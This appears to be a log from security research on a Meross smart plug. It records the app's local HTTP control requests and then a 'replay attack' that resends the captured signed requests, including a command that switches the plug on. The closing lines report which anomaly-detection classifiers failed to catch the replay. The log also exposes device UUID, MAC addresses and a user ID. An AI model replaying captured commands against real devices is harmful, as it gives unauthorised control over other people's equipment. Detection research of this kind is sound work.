POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"cba630eca96c23a169f831880fc1e57d","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"6ad35964480099e1f68acdec27deb99f","timestamp":1693905386,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"cba630eca96c23a169f831880fc1e57d","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693905386,"timestampMs":919,"sign":"6ad35964480099e1f68acdec27deb99f"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1693905386,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":0}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":1693905361}],"triggerx":[],"timerx":[]}}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"18db8c53f0d3020eb2aa856909cbfe6e","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"340a0de42effa02ba7a9a731cdacaf76","timestamp":1693905386,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"18db8c53f0d3020eb2aa856909cbfe6e","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693905386,"timestampMs":5,"sign":"340a0de42effa02ba7a9a731cdacaf76"},"payload":{"online":{"status":0}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"f367335500a6b3acf4b06b16f5a4dc50","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"855e753541259a5af0a2cae97c0cc736","timestamp":1693905393,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"f367335500a6b3acf4b06b16f5a4dc50","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693905393,"timestampMs":266,"sign":"855e753541259a5af0a2cae97c0cc736"},"payload":{}}

START REPLAY ATTACK
#######################################################################################
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"f367335500a6b3acf4b06b16f5a4dc50","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"855e753541259a5af0a2cae97c0cc736","timestamp":1693905393,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"f367335500a6b3acf4b06b16f5a4dc50","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693905439,"timestampMs":981,"sign":"5ab35dc7f3098baba8d0701734f68391"},"payload":{}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"18db8c53f0d3020eb2aa856909cbfe6e","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"340a0de42effa02ba7a9a731cdacaf76","timestamp":1693905386,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"18db8c53f0d3020eb2aa856909cbfe6e","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693905439,"timestampMs":989,"sign":"681640c7cb188fa864eec0672eaa57cd"},"payload":{"online":{"status":0}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"cba630eca96c23a169f831880fc1e57d","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"6ad35964480099e1f68acdec27deb99f","timestamp":1693905386,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"cba630eca96c23a169f831880fc1e57d","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693905439,"timestampMs":996,"sign":"0d69be643c3de36256fdc920a88c3fdb"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1693905439,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":0}},"digest":{"togglex":[{"channel":0,"onoff":1,"lmTime":1693905439}],"triggerx":[],"timerx":[]}}}}

****************************************************************
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=OneClassSVM(gamma='auto', nu=0.001)
REPLAY ATTACK SUCCESSFUL WITH CLF=IsolationForest(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=EllipticEnvelope(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=LocalOutlierFactor(contamination=0.01, novelty=True)
REPLAY ATTACK SUCCESSFUL WITH CLF=CustomClassifier()
END REPLAY ATTACK
